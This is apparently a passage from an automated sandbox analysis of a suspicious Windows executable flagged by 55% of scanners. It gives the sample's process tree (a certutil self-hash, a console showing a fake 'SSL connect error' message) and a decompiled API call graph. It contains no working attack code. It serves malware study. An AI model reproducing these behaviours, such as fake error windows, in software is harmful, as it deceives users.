                                                  • Detection: 55%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:15:15:04
                                                  Start date:20/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:15:15:13
                                                  Start date:20/10/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
                                                  Imagebase:0x7ff703a40000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:8
                                                  Start time:15:15:13
                                                  Start date:20/10/2024
                                                  Path:C:\Windows\System32\certutil.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5
                                                  Imagebase:0x7ff66f4f0000
                                                  File size:1'651'712 bytes
                                                  MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:15:15:13
                                                  Start date:20/10/2024
                                                  Path:C:\Windows\System32\find.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:find /i /v "md5"
                                                  Imagebase:0x7ff7311b0000
                                                  File size:17'920 bytes
                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:15:15:13
                                                  Start date:20/10/2024
                                                  Path:C:\Windows\System32\find.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:find /i /v "certutil"
                                                  Imagebase:0x7ff7311b0000
                                                  File size:17'920 bytes
                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:12
                                                  Start time:15:15:16
                                                  Start date:20/10/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
                                                  Imagebase:0x7ff703a40000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:13
                                                  Start time:15:15:16
                                                  Start date:20/10/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
                                                  Imagebase:0x7ff703a40000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:14
                                                  Start time:15:15:16
                                                  Start date:20/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:17
                                                  Start time:15:15:17
                                                  Start date:20/10/2024
                                                  Path:C:\Windows\System32\timeout.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:timeout /t 5
                                                  Imagebase:0x7ff7b0ef0000
                                                  File size:32'768 bytes
                                                  MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:18
                                                  Start time:15:15:17
                                                  Start date:20/10/2024
                                                  Path:C:\Windows\System32\WerFault.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 1308 -s 1708
                                                  Imagebase:0x7ff75d680000
                                                  File size:570'736 bytes
                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:7.8%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:27.6%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:15
                                                    execution_graph 5201 7ff7738e8db0 5202 7ff7738e8de3 5201->5202 5203 7ff7738e9e00 10 API calls 5202->5203 5209 7ff7738e8e41 5202->5209 5204 7ff7738e8e06 5203->5204 5207 7ff7738e8e14 _fseeki64 5204->5207 5208 7ff7738e8e2b fgetpos 5204->5208 5204->5209 5205 7ff7738f3fc0 8 API calls 5206 7ff7738e8eab 5205->5206 5207->5208 5207->5209 5208->5209 5209->5205 5000 7ff7738e1b20 memset 5042 7ff7738e9790 5000->5042 5003 7ff7738e1bc5 5006 7ff7738e1e13 5003->5006 5009 7ff7738e1be1 5003->5009 5010 7ff7738e1c0a 5003->5010 5004 7ff7738e1c37 5005 7ff7738e1c3c ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J ??Bios_base@std@ 5004->5005 5007 7ff7738e1d2c 5005->5007 5008 7ff7738e1c6b 5005->5008 5102 7ff7738ed3b0 ?_Xlength_error@std@@YAXPEBD 5006->5102 5073 7ff7738ec9f0 5007->5073 5049 7ff7738e1a70 5008->5049 5015 7ff7738e1e0e 5009->5015 5057 7ff7738f4108 5009->5057 5012 7ff7738f4108 std::_Facet_Register 3 API calls 5010->5012 5024 7ff7738e1bf3 5012->5024 5099 7ff7738e1190 5015->5099 5017 7ff7738e1d4d 5022 7ff7738e1d89 5017->5022 5025 7ff7738e1d7e 5017->5025 5028 7ff7738e1d77 _invalid_parameter_noinfo_noreturn 5017->5028 5021 7ff7738e1c15 memset 5021->5005 5027 7ff7738e1e20 15 API calls 5022->5027 5023 7ff7738e1cdc 5069 7ff7738e1e20 5023->5069 5024->5021 5024->5028 5032 7ff7738f3fe0 free 5025->5032 5026 7ff7738e1cd1 5066 7ff7738f3fe0 5026->5066 5034 7ff7738e1d97 5027->5034 5028->5025 5031 7ff7738e1cca _invalid_parameter_noinfo_noreturn 5031->5026 5032->5022 5035 7ff7738e1dce 5034->5035 5036 7ff7738e1dc6 5034->5036 5038 7ff7738e1e07 _invalid_parameter_noinfo_noreturn 5034->5038 5090 7ff7738f3fc0 5035->5090 5040 7ff7738f3fe0 free 5036->5040 5038->5015 5040->5035 5043 7ff7738e97bb ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 5042->5043 5044 7ff7738e97b8 5042->5044 5103 7ff7738ea170 5043->5103 5044->5043 5047 7ff7738e9872 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 5048 7ff7738e1b81 ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2 ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH 5047->5048 5048->5003 5048->5004 5133 7ff7738e1330 5049->5133 5052 7ff7738e1ac8 5054 7ff7738e1b06 5052->5054 5141 7ff7738e1030 5052->5141 5144 7ff7738e9930 5052->5144 5055 7ff7738f3fc0 8 API calls 5054->5055 5056 7ff7738e1b16 5055->5056 5056->5023 5056->5026 5056->5031 5058 7ff7738f4122 malloc 5057->5058 5059 7ff7738f4113 5058->5059 5060 7ff7738f412c 5058->5060 5059->5058 5061 7ff7738f4132 5059->5061 5060->5024 5062 7ff7738f413d 5061->5062 5173 7ff7738f4b1c 5061->5173 5064 7ff7738e1190 Concurrency::cancel_current_task __std_exception_copy 5062->5064 5065 7ff7738f4143 5064->5065 5066->5023 5067 7ff7738f4af4 free 5066->5067 5070 7ff7738e1e76 5069->5070 5071 7ff7738e1eb3 ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 5070->5071 5177 7ff7738e9ef0 5070->5177 5074 7ff7738eca16 5073->5074 5075 7ff7738ecae1 5073->5075 5076 7ff7738eca24 memmove 5074->5076 5080 7ff7738eca3c 5074->5080 5195 7ff7738e1230 ?_Xlength_error@std@@YAXPEBD 5075->5195 5076->5017 5078 7ff7738ecae6 5084 7ff7738e1190 Concurrency::cancel_current_task __std_exception_copy 5078->5084 5079 7ff7738ecaa4 5082 7ff7738eca68 memmove 5079->5082 5085 7ff7738f4108 std::_Facet_Register 3 API calls 5079->5085 5080->5078 5080->5079 5081 7ff7738eca4d 5080->5081 5083 7ff7738f4108 std::_Facet_Register 3 API calls 5081->5083 5082->5017 5087 7ff7738eca63 5083->5087 5088 7ff7738ecaec 5084->5088 5085->5082 5087->5082 5089 7ff7738eca9d _invalid_parameter_noinfo_noreturn 5087->5089 5089->5079 5091 7ff7738f3fc9 5090->5091 5092 7ff7738e1df0 5091->5092 5093 7ff7738f43ec IsProcessorFeaturePresent 5091->5093 5094 7ff7738f4404 5093->5094 5196 7ff7738f45e0 RtlCaptureContext 5094->5196 5100 7ff7738e119e Concurrency::cancel_current_task 5099->5100 5101 7ff7738e11af __std_exception_copy 5100->5101 5101->5006 5104 7ff7738ea19e ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH 5103->5104 5111 7ff7738ea25a 5103->5111 5105 7ff7738ea1bc ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ _get_stream_buffer_pointers ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2 5104->5105 5104->5111 5112 7ff7738ec7a0 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 5105->5112 5106 7ff7738f3fc0 8 API calls 5109 7ff7738e986d 5106->5109 5109->5047 5109->5048 5110 7ff7738ea260 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 5110->5111 5111->5106 5114 7ff7738ec802 5112->5114 5113 7ff7738ec877 ??1_Lockit@std@@QEAA 5115 7ff7738f3fc0 8 API calls 5113->5115 5114->5113 5116 7ff7738ec825 5114->5116 5117 7ff7738ec819 ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 5114->5117 5118 7ff7738ea24a ?always_noconv@codecvt_base@std@ 5115->5118 5116->5113 5119 7ff7738ec83c ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ 5116->5119 5117->5116 5118->5110 5118->5111 5120 7ff7738ec850 5119->5120 5121 7ff7738ec8a7 5119->5121 5126 7ff7738f3868 5120->5126 5129 7ff7738e1280 5121->5129 5124 7ff7738ec8ac 5127 7ff7738f4108 std::_Facet_Register 3 API calls 5126->5127 5128 7ff7738ec862 5127->5128 5128->5113 5132 7ff7738e1250 5129->5132 5131 7ff7738e128e _CxxThrowException __std_exception_copy 5131->5124 5132->5131 5134 7ff7738e139d malloc 5133->5134 5135 7ff7738e1387 5133->5135 5136 7ff7738e13c3 memmove 5134->5136 5137 7ff7738e1a57 5134->5137 5135->5134 5138 7ff7738e13ed memset 5136->5138 5140 7ff7738e1404 free 5136->5140 5137->5052 5138->5140 5140->5137 5151 7ff7738e1020 5141->5151 5143 7ff7738e1055 __stdio_common_vsprintf 5143->5052 5145 7ff7738e9944 5144->5145 5145->5145 5146 7ff7738e999f 5145->5146 5147 7ff7738e9960 memmove 5145->5147 5152 7ff7738ecea0 5146->5152 5147->5052 5150 7ff7738e99b2 5150->5052 5151->5143 5153 7ff7738ed022 5152->5153 5155 7ff7738ecece 5152->5155 5172 7ff7738e1230 ?_Xlength_error@std@@YAXPEBD 5153->5172 5156 7ff7738ecf2e 5155->5156 5159 7ff7738ecf21 5155->5159 5160 7ff7738ecf5a 5155->5160 5158 7ff7738f4108 std::_Facet_Register 3 API calls 5156->5158 5157 7ff7738ed027 5162 7ff7738e1190 Concurrency::cancel_current_task __std_exception_copy 5157->5162 5161 7ff7738ecf43 5158->5161 5159->5156 5159->5157 5160->5161 5164 7ff7738f4108 std::_Facet_Register 3 API calls 5160->5164 5163 7ff7738ecfdb _invalid_parameter_noinfo_noreturn 5161->5163 5166 7ff7738ecfe2 memmove memmove 5161->5166 5167 7ff7738ecf8e memmove memmove 5161->5167 5165 7ff7738ed02d 5162->5165 5163->5166 5164->5161 5165->5150 5168 7ff7738ecfd9 5166->5168 5169 7ff7738ecfce 5167->5169 5170 7ff7738ecfb9 5167->5170 5168->5150 5171 7ff7738f3fe0 free 5169->5171 5170->5163 5170->5169 5171->5168 5176 7ff7738f4afc 5173->5176 5175 7ff7738f4b2a _CxxThrowException 5176->5175 5178 7ff7738e9f65 5177->5178 5179 7ff7738e9f07 5177->5179 5180 7ff7738e9f67 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 5178->5180 5183 7ff7738e9e00 5179->5183 5180->5071 5182 7ff7738e9f41 fclose 5182->5180 5184 7ff7738e9ed3 5183->5184 5185 7ff7738e9e23 5183->5185 5186 7ff7738f3fc0 8 API calls 5184->5186 5185->5184 5188 7ff7738e9e2d 5185->5188 5187 7ff7738e9ee2 5186->5187 5187->5182 5189 7ff7738e9e46 ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD 5188->5189 5190 7ff7738e9e71 5188->5190 5191 7ff7738e9e6c 5189->5191 5192 7ff7738f3fc0 8 API calls 5190->5192 5191->5190 5194 7ff7738e9ea7 fwrite 5191->5194 5193 7ff7738e9e8e 5192->5193 5193->5182 5194->5190 5197 7ff7738f45fa RtlLookupFunctionEntry 5196->5197 5198 7ff7738f4610 RtlVirtualUnwind 5197->5198 5199 7ff7738f4417 5197->5199 5198->5197 5198->5199 5200 7ff7738f43b8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5199->5200 5210 7ff7738ea5a0 ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD ?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 4972 7ff7738f4654 4973 7ff7738f4664 4972->4973 4985 7ff7738f41bc 4973->4985 4976 7ff7738f4709 4977 7ff7738f4688 _RTC_Initialize 4983 7ff7738f46eb 4977->4983 4993 7ff7738f4e20 InitializeSListHead 4977->4993 4984 7ff7738f46f9 4983->4984 4994 7ff7738f4b58 IsProcessorFeaturePresent 4983->4994 4986 7ff7738f41ff 4985->4986 4987 7ff7738f41cd 4985->4987 4986->4977 4988 7ff7738f423c 4987->4988 4991 7ff7738f41d2 __scrt_acquire_startup_lock 4987->4991 4989 7ff7738f4b58 9 API calls 4988->4989 4990 7ff7738f4246 4989->4990 4991->4986 4992 7ff7738f41ef _initialize_onexit_table 4991->4992 4992->4986 4995 7ff7738f4b7e 4994->4995 4996 7ff7738f4b8c memset RtlCaptureContext RtlLookupFunctionEntry 4995->4996 4997 7ff7738f4bc6 RtlVirtualUnwind 4996->4997 4998 7ff7738f4c02 memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 4996->4998 4997->4998 4999 7ff7738f4c82 4998->4999 4999->4976 5222 7ff7738f4738 5223 7ff7738f4751 5222->5223 5224 7ff7738f488f 5223->5224 5225 7ff7738f4759 __scrt_acquire_startup_lock 5223->5225 5226 7ff7738f4b58 9 API calls 5224->5226 5227 7ff7738f4899 5225->5227 5234 7ff7738f4777 __scrt_release_startup_lock 5225->5234 5226->5227 5228 7ff7738f4b58 9 API calls 5227->5228 5229 7ff7738f48a4 5228->5229 5231 7ff7738f48ac _exit 5229->5231 5230 7ff7738f479c 5232 7ff7738f4822 _get_initial_wide_environment __p___wargv __p___argc 5242 7ff7738f1630 SetUnhandledExceptionFilter 5232->5242 5234->5230 5234->5232 5236 7ff7738f481a _register_thread_local_exe_atexit_callback 5234->5236 5236->5232 5239 7ff7738f484f 5240 7ff7738f4854 _cexit 5239->5240 5241 7ff7738f4859 5239->5241 5240->5241 5241->5230 5243 7ff7738f173c 5242->5243 5245 7ff7738f1694 5242->5245 5581 7ff7738f1390 5243->5581 5245->5243 5246 7ff7738f16c0 _wcsicmp 5245->5246 5248 7ff7738f1b2a 5245->5248 5250 7ff7738f1700 _wcsicmp 5245->5250 5246->5245 5247 7ff7738f1974 5251 7ff7738f19aa 5247->5251 5586 7ff7738ea3c0 5247->5586 5249 7ff7738f1390 2 API calls 5248->5249 5253 7ff7738f1754 5249->5253 5250->5245 5255 7ff7738f19d2 5251->5255 5259 7ff7738ea3c0 9 API calls 5251->5259 5252 7ff7738f1790 _wcsicmp 5252->5253 5253->5252 5257 7ff7738f1808 5253->5257 5263 7ff7738f17d0 _wcsicmp 5253->5263 5261 7ff7738f19f9 5255->5261 5266 7ff7738ea3c0 9 API calls 5255->5266 5256 7ff7738f1840 _wcsicmp 5256->5257 5257->5256 5257->5257 5265 7ff7738f18b9 5257->5265 5268 7ff7738f1880 _wcsicmp 5257->5268 5264 7ff7738f19c2 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5259->5264 5260 7ff7738f1900 _wcsicmp 5260->5265 5262 7ff7738f1a21 5261->5262 5269 7ff7738ea3c0 9 API calls 5261->5269 5272 7ff7738ea3c0 9 API calls 5262->5272 5283 7ff7738f1a48 5262->5283 5263->5253 5264->5255 5265->5247 5265->5260 5270 7ff7738f1940 _wcsicmp 5265->5270 5267 7ff7738f19e9 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5266->5267 5267->5261 5268->5257 5271 7ff7738f1a11 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5269->5271 5270->5265 5271->5262 5275 7ff7738f1a38 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5272->5275 5273 7ff7738f1d3b 5274 7ff7738ea3c0 9 API calls 5273->5274 5276 7ff7738f1d4e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5274->5276 5275->5283 5277 7ff7738ea3c0 9 API calls 5276->5277 5278 7ff7738f1d71 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5277->5278 5280 7ff7738f1d81 5278->5280 5279 7ff7738ec8b0 7 API calls 5279->5283 5281 7ff7738f3fc0 8 API calls 5280->5281 5282 7ff7738f1d92 5281->5282 5366 7ff7738f4cac GetModuleHandleW 5282->5366 5283->5273 5283->5279 5287 7ff7738f1db3 _invalid_parameter_noinfo_noreturn 5283->5287 5288 7ff7738f1dc8 5283->5288 5289 7ff7738f1dba _invalid_parameter_noinfo_noreturn 5283->5289 5291 7ff7738f3fe0 free 5283->5291 5292 7ff7738f1dc1 _invalid_parameter_noinfo_noreturn 5283->5292 5368 7ff7738f3948 ___lc_codepage_func 5283->5368 5371 7ff7738f22d0 5283->5371 5287->5289 5288->5273 5290 7ff7738f1dd5 5288->5290 5289->5292 5389 7ff7738ec8b0 5290->5389 5291->5283 5292->5288 5294 7ff7738f1e07 5295 7ff7738ec8b0 7 API calls 5294->5295 5296 7ff7738f1e36 5295->5296 5406 7ff7738f3b60 5296->5406 5298 7ff7738f221e 5771 7ff7738f1280 5298->5771 5299 7ff7738f1f30 5304 7ff7738f1f34 5299->5304 5305 7ff7738f1f8a 5299->5305 5300 7ff7738f1e5d 5300->5298 5300->5299 5302 7ff7738f1f2b 5300->5302 5307 7ff7738f1f17 _invalid_parameter_noinfo_noreturn 5300->5307 5309 7ff7738f3fe0 free 5302->5309 5306 7ff7738ea3c0 9 API calls 5304->5306 5444 7ff7738e45e0 LoadLibraryA LoadLibraryA _dupenv_s 5305->5444 5310 7ff7738f1f47 5306->5310 5307->5300 5309->5299 5600 7ff7738ed590 5310->5600 5313 7ff7738f1fa1 5571 7ff7738f1590 GetShellWindow GetWindowThreadProcessId 5313->5571 5314 7ff7738f1fab 5317 7ff7738f4108 std::_Facet_Register 3 API calls 5314->5317 5315 7ff7738f1f61 5319 7ff7738ea3c0 9 API calls 5315->5319 5318 7ff7738f1fc7 5317->5318 5614 7ff7738f3080 memset 5318->5614 5321 7ff7738f1f70 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5319->5321 5323 7ff7738f1590 28 API calls 5321->5323 5325 7ff7738f1f85 5323->5325 5324 7ff7738f2131 5329 7ff7738f3fe0 free 5324->5329 5325->5280 5325->5324 5328 7ff7738f220b _invalid_parameter_noinfo_noreturn 5325->5328 5326 7ff7738f1fef 5330 7ff7738ea3c0 9 API calls 5326->5330 5327 7ff7738f2007 5331 7ff7738f2025 5327->5331 5332 7ff7738f200c 5327->5332 5334 7ff7738f2212 5328->5334 5329->5280 5333 7ff7738f2002 5330->5333 5632 7ff7738ee020 5331->5632 5332->5331 5335 7ff7738f2010 5332->5335 5336 7ff7738f2096 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5333->5336 5337 7ff7738f3fe0 free 5334->5337 5338 7ff7738ea3c0 9 API calls 5335->5338 5730 7ff7738e5a80 5336->5730 5337->5280 5338->5333 5342 7ff7738f213b 5346 7ff7738e5a80 94 API calls 5342->5346 5343 7ff7738f2069 5345 7ff7738ea3c0 9 API calls 5343->5345 5348 7ff7738f207c 5345->5348 5349 7ff7738f2147 5346->5349 5347 7ff7738f1590 28 API calls 5350 7ff7738f20b7 5347->5350 5351 7ff7738ed590 9 API calls 5348->5351 5352 7ff7738f2173 5349->5352 5353 7ff7738ea3c0 9 API calls 5349->5353 5350->5325 5354 7ff7738f20e9 5350->5354 5357 7ff7738f21c4 _invalid_parameter_noinfo_noreturn 5350->5357 5351->5336 5355 7ff7738ea3c0 9 API calls 5352->5355 5356 7ff7738f215e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5353->5356 5358 7ff7738f3fe0 free 5354->5358 5359 7ff7738f2186 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5355->5359 5361 7ff7738f1590 28 API calls 5356->5361 5360 7ff7738f21cb 5357->5360 5362 7ff7738f20f1 5358->5362 5363 7ff7738f21d3 5359->5363 5364 7ff7738f219c 5359->5364 5365 7ff7738f3fe0 free 5360->5365 5361->5352 5362->5325 5363->5280 5363->5328 5363->5334 5364->5357 5364->5360 5365->5363 5367 7ff7738f484b 5366->5367 5367->5229 5367->5239 5369 7ff7738f395b AreFileApisANSI 5368->5369 5370 7ff7738f3968 5368->5370 5369->5370 5370->5283 5372 7ff7738f2320 5371->5372 5373 7ff7738f1be9 memcmp 5371->5373 5388 7ff7738f2411 5372->5388 5788 7ff7738f3970 5372->5788 5373->5283 5377 7ff7738f2417 5378 7ff7738f0880 12 API calls 5377->5378 5381 7ff7738f2423 5378->5381 5379 7ff7738f23b3 5798 7ff7738f2770 5379->5798 5380 7ff7738f238c memset 5384 7ff7738f2360 5380->5384 5385 7ff7738f3970 __std_fs_convert_wide_to_narrow 5 API calls 5384->5385 5386 7ff7738f23e0 5385->5386 5386->5373 5818 7ff7738f0880 5386->5818 5822 7ff7738f05b0 5388->5822 5390 7ff7738ec8d6 5389->5390 5391 7ff7738ec9d7 5389->5391 5392 7ff7738ec90f 5390->5392 5393 7ff7738ec8e9 memmove 5390->5393 5836 7ff7738e1230 ?_Xlength_error@std@@YAXPEBD 5391->5836 5395 7ff7738ec9dc 5392->5395 5397 7ff7738ec990 5392->5397 5398 7ff7738ec96e 5392->5398 5393->5294 5396 7ff7738e1190 Concurrency::cancel_current_task __std_exception_copy 5395->5396 5400 7ff7738ec9e2 5396->5400 5399 7ff7738ec97b memmove 5397->5399 5402 7ff7738f4108 std::_Facet_Register 3 API calls 5397->5402 5401 7ff7738f4108 std::_Facet_Register 3 API calls 5398->5401 5399->5294 5404 7ff7738ec976 5401->5404 5402->5399 5404->5399 5405 7ff7738ec989 _invalid_parameter_noinfo_noreturn 5404->5405 5405->5397 5410 7ff7738f3ba2 5406->5410 5407 7ff7738f3bab 5408 7ff7738f3fc0 8 API calls 5407->5408 5411 7ff7738f3e4d 5408->5411 5409 7ff7738f3cbd 5837 7ff7738f3e88 CreateFileW 5409->5837 5410->5407 5410->5409 5413 7ff7738f3c03 GetFileAttributesExW 5410->5413 5411->5300 5415 7ff7738f3c17 GetLastError 5413->5415 5416 7ff7738f3c68 5413->5416 5415->5407 5419 7ff7738f3c26 FindFirstFileW 5415->5419 5416->5407 5416->5409 5417 7ff7738f3d06 5422 7ff7738f3d15 GetFileInformationByHandleEx 5417->5422 5423 7ff7738f3db7 5417->5423 5418 7ff7738f3ce6 5420 7ff7738f3cf1 CloseHandle 5418->5420 5421 7ff7738f3cff 5418->5421 5424 7ff7738f3c45 FindClose 5419->5424 5425 7ff7738f3c3a GetLastError 5419->5425 5420->5421 5426 7ff7738f3e78 abort 5420->5426 5421->5407 5429 7ff7738f3d2f GetLastError 5422->5429 5430 7ff7738f3d58 5422->5430 5427 7ff7738f3e12 5423->5427 5428 7ff7738f3dd2 GetFileInformationByHandleEx 5423->5428 5424->5416 5425->5407 5426->5421 5431 7ff7738f3e65 5427->5431 5432 7ff7738f3e29 5427->5432 5428->5427 5433 7ff7738f3de8 GetLastError 5428->5433 5429->5421 5434 7ff7738f3d3d CloseHandle 5429->5434 5430->5423 5436 7ff7738f3d79 GetFileInformationByHandleEx 5430->5436 5431->5421 5437 7ff7738f3e6b CloseHandle 5431->5437 5432->5407 5435 7ff7738f3e2f CloseHandle 5432->5435 5433->5421 5438 7ff7738f3dfa CloseHandle 5433->5438 5434->5421 5439 7ff7738f3d4a abort 5434->5439 5435->5407 5435->5426 5436->5423 5440 7ff7738f3d95 GetLastError 5436->5440 5437->5421 5437->5426 5438->5421 5441 7ff7738f3e0b abort 5438->5441 5439->5421 5440->5421 5442 7ff7738f3da3 CloseHandle 5440->5442 5441->5427 5442->5421 5443 7ff7738f3db0 abort 5442->5443 5443->5423 5445 7ff7738e4670 5444->5445 5445->5445 5446 7ff7738ec9f0 7 API calls 5445->5446 5447 7ff7738e4683 5446->5447 5840 7ff7738ea0f0 5447->5840 5449 7ff7738e469b 5450 7ff7738e46f9 free 5449->5450 5452 7ff7738e46f4 5449->5452 5454 7ff7738e46ed _invalid_parameter_noinfo_noreturn 5449->5454 5451 7ff7738ec9f0 7 API calls 5450->5451 5453 7ff7738e4762 5451->5453 5455 7ff7738f3fe0 free 5452->5455 5846 7ff7738e9af0 5453->5846 5454->5452 5455->5450 5457 7ff7738e4770 5867 7ff7738e3ce0 5457->5867 5460 7ff7738ec9f0 7 API calls 5462 7ff7738e47c5 SymFromName 5460->5462 5461 7ff7738ea3c0 9 API calls 5463 7ff7738e48bd ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5461->5463 5464 7ff7738e485e 5462->5464 5465 7ff7738e4828 5462->5465 5467 7ff7738e4ec1 5463->5467 5466 7ff7738e48a5 5464->5466 5470 7ff7738e48a0 5464->5470 5475 7ff7738e4899 _invalid_parameter_noinfo_noreturn 5464->5475 5472 7ff7738e4857 5465->5472 5465->5475 5479 7ff7738e4790 5465->5479 5471 7ff7738e48d2 _time64 GetCurrentThreadId srand rand 5466->5471 5466->5479 5468 7ff7738e4f05 5467->5468 5469 7ff7738e4ed8 SymUnloadModule64 SymCleanup CloseHandle CloseHandle 5467->5469 5474 7ff7738e4f3c 5468->5474 5483 7ff7738e4f7e _invalid_parameter_noinfo_noreturn 5468->5483 5484 7ff7738f3fe0 free 5468->5484 5469->5468 5476 7ff7738f3fe0 free 5470->5476 5477 7ff7738e4953 5471->5477 5478 7ff7738e499a 5471->5478 5473 7ff7738f3fe0 free 5472->5473 5473->5479 5481 7ff7738e4f8a 5474->5481 5474->5483 5485 7ff7738e4f85 5474->5485 5475->5470 5476->5466 5482 